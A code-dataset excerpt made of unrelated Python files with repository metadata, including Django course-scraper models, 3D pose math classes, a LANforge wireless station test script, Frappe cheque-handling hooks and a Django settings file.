env.node_map[host]['bootstrap_status'] = status.SUCCESS
node_result['task_status'] = task_status
tmp_data_map = result.get('data_map')
if tmp_data_map is not None:
for map_name, tmp_map_data in tmp_data_map.items():
if tmp_map_data['type'] == 'table':
map_data = data_map.get(map_name, {
'name': map_name,
'type': 'table',
'data': [],
})
tmp_data = {'!!host': host}
tmp_data.update(tmp_map_data['data'])
map_data['data'].append(tmp_data)
data_map[map_name] = map_data
elif tmp_map_data['type'] == 'multi-table':
map_data = data_map.get(map_name, {
'name': map_name,
'type': 'multi-table',
'data': [],
})
tmp_data = {'!!host': host}
tmp_data.update(tmp_map_data['data'])
map_data['data'].append(tmp_data)
data_map[map_name] = map_data
elif tmp_map_data['type'] == 'line-chart':
map_data = data_map.get(map_name, {
'name': map_name,
'type': 'line-chart',
'data': [],
})
map_data['ex_data'] = tmp_map_data['ex_data']
map_data['layout'] = tmp_map_data['layout']
tmp_data = {'!!host': host}
tmp_data.update(tmp_map_data['data'])
map_data['data'].append(tmp_data)
data_map[map_name] = map_data
if env.is_setup:
node_result['msg'] = msg
if result_status is not None:
tmp_status = result_status
node_result['status'] = result_status
expected = cluster_run['expected_status']
if expected == result_status:
is_expected = True
log.info('{0}: {1} is expected status.'.format(
host, msg, result_status))
else:
is_contain_unexpected = True
log.error('expected status is {0}, bad status is {1}.'.format( # noqa
expected, result_status), host)
elif env.is_check:
node_result['check_msg'] = msg
if result_status is None:
result_status = status.SUCCESS
node_result.update({
'check_status': result_status,
})
if result_status != status.SUCCESS:
log.error('Failed check {0}.{1} [{2}]. {3}'.format( # noqa
script_name, candidate, result_status, msg), host)
if task_status == status.SUCCESS:
log.info('Success task {0}.{1} [{2}]. {3}'.format(
script_name, candidate, task_status, msg), host)
else:
log.error('Failed task {0}.{1} [{2}]. {3}'.format(
script_name, candidate, task_status, msg), host)
is_contain_failed = True
# end for host, result in results.items():
if len(data_map) > 0:
util.dump_datamap(data_map)
if is_contain_failed:
log.error('Failed task {0}.{1}. Exit setup.'.format(
script_name, candidate))
util.dump_status()
exit()
if tmp_status is not None:
env.fabscript['tmp_status'] = tmp_status
# for candidate in module_funcs:
# for func_pattern in func_patterns:
if env.is_setup:
if is_expected and not is_contain_unexpected or cluster_run['expected_status'] == 0:
env.cluster['__status']['fabscript_map'][script_name] = {
'status': cluster_run['expected_status'],
'task_status': status.SUCCESS,
}
util.dump_status()
else:
log.error('bad status.')
exit()
elif env.is_check:
env.cluster['__status']['fabscript_map'][script_name]['task_status'] = status.SUCCESS # noqa
util.dump_status()
elif env.is_manage:
env.cluster['__status']['fabscript_map'][script_name]['task_status'] = status.SUCCESS # noqa
util.dump_status()
# reset env
for key, value in default_env.items():
if value is not None:
setattr(env, key, value)
# end for cluster_run in run['runs']:
# end for run in env.runs:
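# Illustrative sketch only: how the 'f' kwarg handled in run_func() above is
# interpreted. "f=check_nova+setup_.*db" selects every fabscript whose name
# matches any of the '+'-separated regexes via re.search(); the filter value
# and script names here are hypothetical.
def _example_match_fabscripts(filter_arg, script_names):
    patterns = [re.compile(f) for f in filter_arg.split('+')]
    return [name for name in script_names
            if any(p.search(name) for p in patterns)]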
| 41.661184
| 110
| 0.442953
|
85631ca7fe375d1f3bd69210ac4640aedd1bbd8b
| 470
|
py
|
Python
|
titan/react_pkg/uikit/__init__.py
|
mnieber/gen
|
65f8aa4fb671c4f90d5cbcb1a0e10290647a31d9
|
[
"MIT"
] | null | null | null |
titan/react_pkg/uikit/__init__.py
|
mnieber/gen
|
65f8aa4fb671c4f90d5cbcb1a0e10290647a31d9
|
[
"MIT"
] | null | null | null |
titan/react_pkg/uikit/__init__.py
|
mnieber/gen
|
65f8aa4fb671c4f90d5cbcb1a0e10290647a31d9
|
[
"MIT"
] | null | null | null |
from pathlib import Path
from moonleap import add, create
from titan.project_pkg.service import Tool
from titan.react_pkg.nodepackage import load_node_package_config
class UIkit(Tool):
pass
base_tags = [("uikit", ["tool"])]
@create("uikit")
def create_uikit(term):
uikit = UIkit(name="uikit")
uikit.add_template_dir(Path(__file__).parent / "templates")
uikit.output_path = "src"
add(uikit, load_node_package_config(__file__))
return uikit
| 21.363636
| 64
| 0.738298
|
dcd4702743d09df31d6d98330bb7952de30d9f91
| 3,450
|
py
|
Python
|
src/oscartest/getcrndetails/models.py
|
AlexanderPuckhaber/django-oscar-scraper
|
b58d8f0414572085fdec01aa991852cebb6cb290
|
[
"MIT"
] | 1
|
2021-01-12T22:09:39.000Z
|
2021-01-12T22:09:39.000Z
|
src/oscartest/getcrndetails/models.py
|
AlexanderPuckhaber/django-oscar-scraper
|
b58d8f0414572085fdec01aa991852cebb6cb290
|
[
"MIT"
] | null | null | null |
src/oscartest/getcrndetails/models.py
|
AlexanderPuckhaber/django-oscar-scraper
|
b58d8f0414572085fdec01aa991852cebb6cb290
|
[
"MIT"
] | null | null | null |
from django.db import models
# Create your models here.
from django.db.models import UniqueConstraint
class Semester(models.Model):
semester_str = models.CharField(primary_key=True, max_length=200)
semester_str_readable = models.CharField(max_length=200)
phase1_start_date = models.DateTimeField('start of Phase 1 registration', blank=True, null=True)
phase1_end_date = models.DateTimeField('end of Phase 1 registration', blank=True, null=True)
phase2_start_date = models.DateTimeField('start of Phase 2 registration', blank=True, null=True)
phase2_end_date = models.DateTimeField('end of Phase 2 registration', blank=True, null=True)
def __str__(self):
return self.semester_str
class Course(models.Model):
course_str = models.CharField(primary_key=True, max_length=50)
semester = models.ForeignKey(Semester, on_delete=models.CASCADE)
active = models.BooleanField(default=True)
def __str__(self):
return str(self.semester) + '/' + self.course_str
def course_str_as_list(self):
return self.course_str.split(' ')
class Section(models.Model):
semester = models.ForeignKey(Semester, on_delete=models.CASCADE)
crn = models.IntegerField(primary_key=True)
code = models.CharField(max_length=10, blank=True, null=True)
    active = models.BooleanField(default=True)
course = models.ForeignKey(Course, on_delete=models.CASCADE, blank=True, null=True)
def __str__(self):
return str(self.course) + ':' + str(self.code)+ ':' + str(self.crn)
class SectionCapacities(models.Model):
section_crn = models.ForeignKey(Section, on_delete=models.CASCADE)
seats_capacity = models.IntegerField(default=0)
seats_actual = models.IntegerField(default=0)
seats_remaining = models.IntegerField(default=0)
seats_waitlist_capacity = models.IntegerField(default=0)
seats_waitlist_actual = models.IntegerField(default=0)
seats_waitlist_remaining = models.IntegerField(default=0)
def capacities_as_dict(self):
return {
'seats_capacity': self.seats_capacity,
'seats_actual': self.seats_actual,
'seats_remaining': self.seats_remaining,
'seats_waitlist_capacity': self.seats_waitlist_capacity,
'seats_waitlist_actual': self.seats_waitlist_actual,
'seats_waitlist_remaining': self.seats_waitlist_remaining,
'get_date': self.get_date
}
def capacities_as_list(self):
caps_list = [0]*7 # [list, declaration] not working here ;/
caps_list[0] = self.seats_capacity
caps_list[1] = self.seats_actual
caps_list[2] = self.seats_remaining
caps_list[3] = self.seats_waitlist_capacity
caps_list[4] = self.seats_waitlist_actual
caps_list[5] = self.seats_waitlist_remaining
caps_list[6] = self.get_date
return caps_list
get_date = models.DateTimeField()
class Meta:
constraints=[
models.UniqueConstraint(fields=['section_crn', 'get_date'], name='unique_section_date')
]
def __str__(self):
return str(self.section_crn) + ' date: ' + str(self.get_date) + \
' seats: ' + str(self.seats_capacity) + ',' + str(self.seats_actual) + ',' \
+ str(self.seats_remaining) + ',' + ' waitlist: ' + str(self.seats_waitlist_capacity) + ',' \
+ str(self.seats_waitlist_actual) + ',' + str(self.seats_waitlist_remaining)
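# Illustrative helper (not part of the original models): how the unique
# (section_crn, get_date) constraint above is typically used to pull a
# seat-availability time series for a single CRN.
def example_capacity_history(crn):
    """Return SectionCapacities rows for one CRN ordered by scrape time."""
    section = Section.objects.get(crn=crn)
    return (SectionCapacities.objects
            .filter(section_crn=section)
            .order_by('get_date'))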
| 40.588235
| 100
| 0.698841
|
d0ac68f8300ac131674fce185fec79f951a6f8ea
| 2,422
|
py
|
Python
|
Utils/py/RL_ActionSelection/env_0/tools/naoth/math3d.py
|
BerlinUnited/NaoTH
|
02848ac10c16a5349f1735da8122a64d601a5c75
|
[
"ECL-2.0",
"Apache-2.0"
] | 15
|
2015-01-12T10:46:29.000Z
|
2022-03-28T05:13:14.000Z
|
Utils/py/RL_ActionSelection/env_0/tools/naoth/math3d.py
|
BerlinUnited/NaoTH
|
02848ac10c16a5349f1735da8122a64d601a5c75
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2019-01-20T21:07:50.000Z
|
2020-01-22T14:00:28.000Z
|
Utils/py/RL_ActionSelection/env_0/tools/naoth/math3d.py
|
BerlinUnited/NaoTH
|
02848ac10c16a5349f1735da8122a64d601a5c75
|
[
"ECL-2.0",
"Apache-2.0"
] | 5
|
2018-02-07T18:18:10.000Z
|
2019-10-15T17:01:41.000Z
|
import math
class Vector3:
def __init__(self, x=0, y=0, z=0):
self.x = x
self.y = y
self.z = z
def __add__(self, other):
return Vector3(self.x + other.x, self.y + other.y, self.z + other.z)
def __sub__(self, other):
return Vector3(self.x - other.x, self.y - other.y, self.z - other.z)
def __neg__(self):
return Vector3(-self.x, -self.y, -self.z)
def abs(self):
return math.sqrt(self * self)
def __mul__(self, other):
if isinstance(other, Vector3):
return self.x * other.x + self.y * other.y + self.z * other.z
elif isinstance(other, (int, float, long)):
return Vector3(self.x * other, self.y * other, self.z * other)
else:
return NotImplemented
def __str__(self):
return "({0},{1},{2})".format(self.x, self.y, self.z)
class Matrix3x3:
def __init__(self, c1=Vector3(), c2=Vector3(), c3=Vector3()):
self.c1 = c1
self.c2 = c2
self.c3 = c3
def __mul__(self, other):
if isinstance(other, Matrix3x3):
return Matrix3x3(self * other.c1, self * other.c2, self * other.c3)
elif isinstance(other, Vector3):
return self.c1 * other.x + self.c2 * other.y + self.c3 * other.z
else:
return NotImplemented
def transpose(self):
return Matrix3x3(
Vector3(self.c1.x, self.c2.x, self.c3.x),
Vector3(self.c1.y, self.c2.y, self.c3.y),
Vector3(self.c1.z, self.c2.z, self.c3.z))
    @classmethod
    def eye(cls):
        return cls(
            Vector3(1, 0, 0),
            Vector3(0, 1, 0),
            Vector3(0, 0, 1)
        )
def __str__(self):
return "{0} {1} {2}\n{3} {4} {5}\n{6} {7} {8}".format(
self.c1.x, self.c2.x, self.c3.x,
self.c1.y, self.c2.y, self.c3.y,
self.c1.z, self.c2.z, self.c3.z)
class Pose3D:
def __init__(self):
self.translation = Vector3()
self.rotation = Matrix3x3.eye()
def __mul__(self, other):
if isinstance(other, Vector3):
return self.rotation * other + self.translation
else:
return NotImplemented
def __invert__(self):
p = Pose3D()
p.rotation = self.rotation.transpose()
p.translation = p.rotation * (Vector3() - self.translation)
return p
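if __name__ == "__main__":
    # Minimal self-check, added for illustration only: transform a point into a
    # pose's frame and back using the classes defined above.
    pose = Pose3D()
    pose.translation = Vector3(100, 0, 50)
    point = Vector3(10, 20, 30)
    transformed = pose * point
    restored = (~pose) * transformed
    print("transformed: {0}, restored: {1}".format(transformed, restored))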
| 28.494118
| 79
| 0.545417
|
759874c6d87e12fa478595d2b1509e3be00b09a1
| 1,630
|
py
|
Python
|
kajaas/index/forms.py
|
bandarupallibnk/azuretest
|
9829f603465e2f21811592f3ec1c6f688e0085e4
|
[
"MIT"
] | null | null | null |
kajaas/index/forms.py
|
bandarupallibnk/azuretest
|
9829f603465e2f21811592f3ec1c6f688e0085e4
|
[
"MIT"
] | null | null | null |
kajaas/index/forms.py
|
bandarupallibnk/azuretest
|
9829f603465e2f21811592f3ec1c6f688e0085e4
|
[
"MIT"
] | null | null | null |
from flask import Flask
from flask_wtf import FlaskForm
from wtforms import StringField,SubmitField,BooleanField,PasswordField,RadioField,DateField,SelectField
from wtforms.fields.html5 import EmailField
from wtforms.validators import DataRequired,EqualTo
class clsignup(FlaskForm):
username = StringField("User Name")
firstname = StringField("First Name")
    lastname = StringField("Last Name")  # currently not used
email = EmailField("Email Id",validators=[DataRequired()])
password = PasswordField("Password",validators=[EqualTo('confirmpassword')])
confirmpassword = PasswordField("Confirm Password",validators=[DataRequired()])
ageo18 = BooleanField("Confirm your age is over 18 years")
submit = SubmitField("Submit")
class clslogin(FlaskForm):
username = StringField("User Name")
password = PasswordField("Password")
login = SubmitField("Login")
class clsspongesignup(FlaskForm):
sfirstname = StringField("First Name")
smiddlename = StringField("Middle Name")
slastname = StringField("Last Name")
sdob = StringField("Date of Birth")
sgender = SelectField('Gender', choices=[('',''),('F','Female'),('M','Male'),('O','Other')])
semail = EmailField("Email Id")
susername = StringField("User Name")
spassword = PasswordField("Password",validators=[EqualTo('sconfirmpassword')])
sconfirmpassword = PasswordField("Confirm Password",validators=[DataRequired()])
ssubmit = SubmitField("Submit")
class clsspongelogin(FlaskForm):
susername = StringField("User Name")
spassword = PasswordField("Password")
slogin = SubmitField("Login")
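# Illustrative only: a sketch of how clslogin would typically be consumed in a
# Flask view. The route, template name, and authentication step are
# hypothetical and not part of this module.
def example_register_login_route(app):
    from flask import redirect, render_template

    @app.route('/login', methods=['GET', 'POST'])
    def login():
        form = clslogin()
        if form.validate_on_submit():
            # authenticate form.username.data / form.password.data here
            return redirect('/')
        return render_template('login.html', form=form)
    return app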
| 40.75
| 103
| 0.730675
|
29f01d7a1f9792e89bd63c991d8878d664db7d09
| 12,660
|
py
|
Python
|
py-scripts/test_generic.py
|
shivamcandela/lanforge-scripts
|
285c91d7d414567f9c6a136f1556ab9fe7546efb
|
[
"BSD-2-Clause-FreeBSD",
"BSD-3-Clause"
] | 1
|
2021-09-27T08:45:56.000Z
|
2021-09-27T08:45:56.000Z
|
py-scripts/test_generic.py
|
shivamcandela/lanforge-scripts
|
285c91d7d414567f9c6a136f1556ab9fe7546efb
|
[
"BSD-2-Clause-FreeBSD",
"BSD-3-Clause"
] | null | null | null |
py-scripts/test_generic.py
|
shivamcandela/lanforge-scripts
|
285c91d7d414567f9c6a136f1556ab9fe7546efb
|
[
"BSD-2-Clause-FreeBSD",
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python3
import pprint
import sys
import os
if sys.version_info[0] != 3:
print("This script requires Python 3")
exit(1)
if 'py-json' not in sys.path:
sys.path.append(os.path.join(os.path.abspath('..'), 'py-json'))
import argparse
from LANforge.lfcli_base import LFCliBase
from LANforge import LFUtils
import realm
import time
import datetime
import json
class GenTest(LFCliBase):
def __init__(self, host, port, ssid, security, passwd, sta_list, name_prefix, upstream,
number_template="000", test_duration="5m", type="lfping", dest=None, cmd =None,
interval=1, radio=None, speedtest_min_up=None, speedtest_min_dl=None, speedtest_max_ping=None,
_debug_on=False,
_exit_on_error=False,
_exit_on_fail=False,):
super().__init__(host, port, _local_realm=realm.Realm(host,port), _debug=_debug_on, _halt_on_error=_exit_on_error, _exit_on_fail=_exit_on_fail)
self.ssid = ssid
self.radio = radio
self.upstream = upstream
self.sta_list = sta_list
self.security = security
self.passwd = passwd
self.number_template = number_template
self.name_prefix = name_prefix
self.test_duration = test_duration
if (speedtest_min_up is not None):
self.speedtest_min_up = float(speedtest_min_up)
if (speedtest_min_dl is not None):
self.speedtest_min_dl = float(speedtest_min_dl)
if (speedtest_max_ping is not None):
self.speedtest_max_ping = float(speedtest_max_ping)
self.debug = _debug_on
self.station_profile = self.local_realm.new_station_profile()
self.generic_endps_profile = self.local_realm.new_generic_endp_profile()
self.station_profile.lfclient_url = self.lfclient_url
self.station_profile.ssid = self.ssid
        self.station_profile.ssid_pass = self.passwd
self.station_profile.security = self.security
self.station_profile.number_template_ = self.number_template
self.station_profile.mode = 0
self.generic_endps_profile.name = name_prefix
self.generic_endps_profile.type = type
self.generic_endps_profile.dest = dest
self.generic_endps_profile.cmd = cmd
self.generic_endps_profile.interval = interval
def choose_ping_command(self):
gen_results = self.json_get("generic/list?fields=name,last+results", debug_=self.debug)
if self.debug:
print(gen_results)
if gen_results['endpoints'] is not None:
for name in gen_results['endpoints']:
for k, v in name.items():
if v['name'] in self.generic_endps_profile.created_endp and not v['name'].endswith('1'):
if v['last results'] != "" and "Unreachable" not in v['last results']:
return True, v['name']
else:
return False, v['name']
def choose_lfcurl_command(self):
return False, ''
def choose_speedtest_command(self):
gen_results = self.json_get("generic/list?fields=name,last+results", debug_=self.debug)
if gen_results['endpoints'] is not None:
for name in gen_results['endpoints']:
for k, v in name.items():
if v['last results'] is not None and v['name'] in self.generic_endps_profile.created_endp and v['last results'] != '':
last_results = json.loads(v['last results'])
if last_results['download'] is None and last_results['upload'] is None and last_results['ping'] is None:
return False, v['name']
elif last_results['download'] >= self.speedtest_min_dl and \
last_results['upload'] >= self.speedtest_min_up and \
last_results['ping'] <= self.speedtest_max_ping:
return True, v['name']
def choose_generic_command(self):
gen_results = self.json_get("generic/list?fields=name,last+results", debug_=self.debug)
if (gen_results['endpoints'] is not None):
for name in gen_results['endpoints']:
for k, v in name.items():
if v['name'] in self.generic_endps_profile.created_endp and not v['name'].endswith('1'):
if v['last results'] != "" and "not known" not in v['last results']:
return True, v['name']
else:
return False, v['name']
def start(self, print_pass=False, print_fail=False):
self.station_profile.admin_up()
temp_stas = []
for station in self.sta_list.copy():
temp_stas.append(self.local_realm.name_to_eid(station)[2])
if self.debug:
pprint.pprint(self.station_profile.station_names)
LFUtils.wait_until_ports_admin_up(base_url=self.lfclient_url, port_list=self.station_profile.station_names)
if self.local_realm.wait_for_ip(temp_stas):
self._pass("All stations got IPs")
else:
self._fail("Stations failed to get IPs")
self.exit_fail()
cur_time = datetime.datetime.now()
passes = 0
expected_passes = 0
self.generic_endps_profile.start_cx()
time.sleep(15)
end_time = self.local_realm.parse_time("30s") + cur_time
print("Starting Test...")
result = False
while cur_time < end_time:
cur_time = datetime.datetime.now()
if self.generic_endps_profile.type == "lfping":
result = self.choose_ping_command()
elif self.generic_endps_profile.type == "generic":
result = self.choose_generic_command()
elif self.generic_endps_profile.type == "lfcurl":
result = self.choose_lfcurl_command()
elif self.generic_endps_profile.type == "speedtest":
result = self.choose_speedtest_command()
elif self.generic_endps_profile.type == "iperf3":
result = self.choose_iperf3_command()
else:
continue
expected_passes += 1
# pprint.pprint(result)
if result is not None:
if result[0]:
passes += 1
else:
self._fail("%s Failed to ping %s " % (result[1], self.generic_endps_profile.dest))
break
time.sleep(1)
if passes == expected_passes:
self._pass("PASS: All tests passed")
def stop(self):
print("Stopping Test...")
self.generic_endps_profile.stop_cx()
self.station_profile.admin_down()
def build(self):
self.station_profile.use_security(self.security, self.ssid, self.passwd)
self.station_profile.set_number_template(self.number_template)
print("Creating stations")
self.station_profile.set_command_flag("add_sta", "create_admin_down", 1)
self.station_profile.set_command_param("set_port", "report_timer", 1500)
self.station_profile.set_command_flag("set_port", "rpt_timer", 1)
self.station_profile.create(radio=self.radio, sta_names_=self.sta_list, debug=self.debug)
self.generic_endps_profile.create(ports=self.station_profile.station_names, sleep_time=.5)
self._pass("PASS: Station build finished")
def cleanup(self, sta_list):
self.generic_endps_profile.cleanup()
self.station_profile.cleanup(sta_list)
LFUtils.wait_until_ports_disappear(base_url=self.lfclient_url, port_list=sta_list, debug=self.debug)
def main():
lfjson_port = 8080
parser = LFCliBase.create_basic_argparse(
prog='test_generic.py',
formatter_class=argparse.RawTextHelpFormatter,
epilog='''Create generic endpoints and test for their ability to execute chosen commands\n''',
description='''test_generic.py
--------------------
Generic command example:
python3 ./test_generic.py
--mgr localhost (optional)
--mgr_port 4122 (optional)
--upstream_port eth1 (optional)
--radio wiphy0 (required)
--num_stations 3 (optional)
--security {open|wep|wpa|wpa2|wpa3} (required)
--ssid netgear (required)
--passwd admin123 (required)
--type lfping {generic|lfping|iperf3-client | speedtest | iperf3-server |lf_curl} (required)
--dest 10.40.0.1 (required - also target for iperf3)
--test_duration 2m
--interval 1s
--debug
Example commands:
LFPING:
./test_generic.py --mgr localhost --mgr_port 4122 --radio wiphy0 --num_stations 7 --ssid jedway-wpa2-x2048-4-1 --passwd jedway-wpa2-x2048-4-1 --type lfping --dest 10.40.0.1 --security wpa2
LFCURL (under construction):
./test_generic.py --mgr localhost --mgr_port 4122 --radio wiphy1 --num_stations 26 --ssid jedway-wpa2-x2048-4-1 --passwd jedway-wpa2-x2048-4-1 --security wpa2 --type lfcurl --dest 10.40.0.1
GENERIC:
    ./test_generic.py --mgr localhost --mgr_port 4122 --radio wiphy1 --num_stations 2 --ssid jedway-wpa2-x2048-4-1 --passwd jedway-wpa2-x2048-4-1 --security wpa2 --type generic
SPEEDTEST:
./test_generic.py --mgr localhost --mgr_port 4122 --radio wiphy2 --num_stations 13 --ssid jedway-wpa2-x2048-4-1 --passwd jedway-wpa2-x2048-4-1 --type speedtest --speedtest_min_up 20
--speedtest_min_dl 20 --speedtest_max_ping 150 --security wpa2
IPERF3 (under construction):
./test_generic.py --mgr localhost --mgr_port 4122 --radio wiphy1 --num_stations 3 --ssid jedway-wpa2-x2048-4-1 --passwd jedway-wpa2-x2048-4-1 --security wpa2 --type iperf3
''')
parser.add_argument('--type', help='type of command to run: generic, lfping, iperf3-client, iperf3-server, lfcurl', default="lfping")
parser.add_argument('--cmd', help='specifies command to be run by generic type endp', default='')
parser.add_argument('--dest', help='destination IP for command', default="10.40.0.1")
parser.add_argument('--test_duration', help='duration of the test eg: 30s, 2m, 4h', default="2m")
parser.add_argument('--interval', help='interval to use when running lfping (1s, 1m)', default=1)
parser.add_argument('--speedtest_min_up', help='sets the minimum upload threshold for the speedtest type', default=None)
parser.add_argument('--speedtest_min_dl', help='sets the minimum download threshold for the speedtest type', default=None)
    parser.add_argument('--speedtest_max_ping', help='sets the maximum ping threshold for the speedtest type', default=None)
args = parser.parse_args()
num_sta = 2
if (args.num_stations is not None) and (int(args.num_stations) > 0):
num_stations_converted = int(args.num_stations)
num_sta = num_stations_converted
station_list = LFUtils.portNameSeries(radio=args.radio,
prefix_="sta",
start_id_=0,
end_id_=num_sta-1,
padding_number_=100)
generic_test = GenTest(host=args.mgr, port=args.mgr_port,
number_template="00",
radio=args.radio,
sta_list=station_list,
name_prefix="GT",
type=args.type,
dest=args.dest,
cmd=args.cmd,
interval=1,
ssid=args.ssid,
upstream=args.upstream_port,
passwd=args.passwd,
security=args.security,
test_duration=args.test_duration,
speedtest_min_up=args.speedtest_min_up,
speedtest_min_dl=args.speedtest_min_dl,
speedtest_max_ping=args.speedtest_max_ping,
_debug_on=args.debug)
generic_test.cleanup(station_list)
generic_test.build()
if not generic_test.passes():
print(generic_test.get_fail_message())
generic_test.exit_fail()
generic_test.start()
if not generic_test.passes():
print(generic_test.get_fail_message())
generic_test.exit_fail()
generic_test.stop()
time.sleep(30)
generic_test.cleanup(station_list)
if generic_test.passes():
generic_test.exit_success()
if __name__ == "__main__":
main()
| 46.036364
| 194
| 0.620932
|
fb1e7f914e3409e305df1bdd927295deb9f9e84a
| 4,953
|
py
|
Python
|
cheque_management/api.py
|
cstkyrilos/cheque_management
|
d290a5ccda684bb1c7eaab2dcdd9dab7d0a1e4c7
|
[
"MIT"
] | null | null | null |
cheque_management/api.py
|
cstkyrilos/cheque_management
|
d290a5ccda684bb1c7eaab2dcdd9dab7d0a1e4c7
|
[
"MIT"
] | null | null | null |
cheque_management/api.py
|
cstkyrilos/cheque_management
|
d290a5ccda684bb1c7eaab2dcdd9dab7d0a1e4c7
|
[
"MIT"
] | 1
|
2021-08-22T16:13:30.000Z
|
2021-08-22T16:13:30.000Z
|
# -*- coding: utf-8 -*-
# Copyright (c) 2017, Direction and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe, erpnext
from frappe.utils import flt, cstr, nowdate, comma_and
from frappe import throw, msgprint, _
def pe_before_submit(self, method):
if self.mode_of_payment == "Cheque" and self.payment_type == "Receive":
notes_acc = frappe.db.get_value("Company", self.company, "receivable_notes_account")
if not notes_acc:
frappe.throw(_("Receivable Notes Account not defined in the company setup page"))
rec_acc = frappe.db.get_value("Company", self.company, "default_receivable_account")
if not rec_acc:
frappe.throw(_("Default Receivable Account not defined in the company setup page"))
self.db_set("paid_to", notes_acc)
self.db_set("paid_from", rec_acc)
if self.mode_of_payment == "Cheque" and self.payment_type == "Pay":
notes_acc = frappe.db.get_value("Company", self.company, "payable_notes_account")
if not notes_acc:
frappe.throw(_("Payable Notes Account not defined in the company setup page"))
rec_acc = frappe.db.get_value("Company", self.company, "default_payable_account")
if not rec_acc:
frappe.throw(_("Default Payable Account not defined in the company setup page"))
self.db_set("paid_from", notes_acc)
self.db_set("paid_to", rec_acc)
def pe_on_submit(self, method):
hh_currency = erpnext.get_company_currency(self.company)
if self.mode_of_payment == "Cheque" and self.paid_from_account_currency != hh_currency:
frappe.throw(_("You cannot use foreign currencies with Mode of Payment Cheque"))
if self.mode_of_payment == "Cheque" and self.paid_to_account_currency != hh_currency:
frappe.throw(_("You cannot use foreign currencies with Mode of Payment Cheque"))
if self.mode_of_payment == "Cheque" and self.payment_type == "Receive":
notes_acc = frappe.db.get_value("Company", self.company, "receivable_notes_account")
if not notes_acc:
frappe.throw(_("Receivable Notes Account not defined in the company setup page"))
self.db_set("paid_to", notes_acc)
rec_acc = frappe.db.get_value("Company", self.company, "default_receivable_account")
if not rec_acc:
frappe.throw(_("Default Receivable Account not defined in the company setup page"))
rc = frappe.new_doc("Receivable Cheques")
rc.cheque_no = self.reference_no
rc.cheque_date = self.reference_date
rc.customer = self.party
rc.company = self.company
rc.payment_entry = self.name
if self.project:
rc.project = self.project
rc.currency = hh_currency
rc.amount = self.base_received_amount
rc.exchange_rate = 1
rc.remarks = self.remarks
#rc.cheque_status = 1
rc.set("status_history", [
{
"status": "Cheque Received",
"transaction_date": nowdate(),
"credit_account": rec_acc,
"debit_account": notes_acc
}
])
rc.insert(ignore_permissions=True)
rc.submit()
message = """<a href="#Form/Receivable Cheques/%s" target="_blank">%s</a>""" % (rc.name, rc.name)
msgprint(_("Receivable Cheque {0} created").format(comma_and(message)))
if self.mode_of_payment == "Cheque" and self.payment_type == "Pay":
notes_acc = frappe.db.get_value("Company", self.company, "payable_notes_account")
if not notes_acc:
frappe.throw(_("Payable Notes Account not defined in the company setup page"))
self.db_set("paid_from", notes_acc)
rec_acc = frappe.db.get_value("Company", self.company, "default_payable_account")
if not rec_acc:
frappe.throw(_("Default Payable Account not defined in the company setup page"))
pc = frappe.new_doc("Payable Cheques")
pc.cheque_no = self.reference_no
pc.cheque_date = self.reference_date
pc.party_type = self.party_type
pc.party = self.party
pc.company = self.company
pc.payment_entry = self.name
if self.project:
pc.project = self.project
pc.currency = hh_currency
pc.amount = self.base_paid_amount
pc.exchange_rate = 1
pc.remarks = self.remarks
#pc.cheque_status = 1
pc.set("status_history", [
{
"status": "Cheque Issued",
"transaction_date": nowdate(),
"credit_account": notes_acc,
"debit_account": rec_acc
}
])
pc.insert(ignore_permissions=True)
pc.submit()
message = """<a href="#Form/Payable Cheques/%s" target="_blank">%s</a>""" % (pc.name, pc.name)
msgprint(_("Payable Cheque {0} created").format(comma_and(message)))
def pe_on_cancel(self, method):
if frappe.db.sql("""select name from `tabReceivable Cheques` where payment_entry=%s and docstatus<>2
and not cheque_status in ("Cheque Cancelled","Cheque Rejected")""" , (self.name)):
frappe.throw(_("Cannot Cancel this Payment Entry as it is Linked with Receivable Cheque"))
if frappe.db.sql("""select name from `tabPayable Cheques` where payment_entry=%s and docstatus<>2
and cheque_status<>'Cheque Cancelled'""" , (self.name)):
frappe.throw(_("Cannot Cancel this Payment Entry as it is Linked with Payable Cheque"))
return
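# Illustration only: these handlers are normally wired to the Payment Entry
# doctype from the app's hooks.py via doc_events, roughly as in the
# hypothetical snippet below (it belongs in hooks.py, not in this file):
#
# doc_events = {
#     "Payment Entry": {
#         "before_submit": "cheque_management.api.pe_before_submit",
#         "on_submit": "cheque_management.api.pe_on_submit",
#         "on_cancel": "cheque_management.api.pe_on_cancel",
#     }
# }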
| 43.831858
| 102
| 0.732889
|
d988acf8e010a32416ff96bc7831aab1c3a79e14
| 3,283
|
py
|
Python
|
config/settings.py
|
mpita/ox
|
04910527c6502c97b87010f833b0ac11294103bd
|
[
"MIT"
] | null | null | null |
config/settings.py
|
mpita/ox
|
04910527c6502c97b87010f833b0ac11294103bd
|
[
"MIT"
] | 1
|
2020-10-17T00:52:01.000Z
|
2020-10-23T23:42:27.000Z
|
config/settings.py
|
mpita/ox
|
04910527c6502c97b87010f833b0ac11294103bd
|
[
"MIT"
] | null | null | null |
"""
Django settings for config project.
Generated by 'django-admin startproject' using Django 3.1.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
import environ
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
env = environ.Env()
environ.Env.read_env()
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = env("DJANGO_SECRET_KEY", default="<Your-secret-key>")
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = env.bool("DJANGO_DEBUG", False)
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
# THIRD APPS
"versatileimagefield",
# LOCAL APPS
"apps.account.apps.AccountConfig",
]
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
]
ROOT_URLCONF = "config.urls"
TEMPLATES = [
{
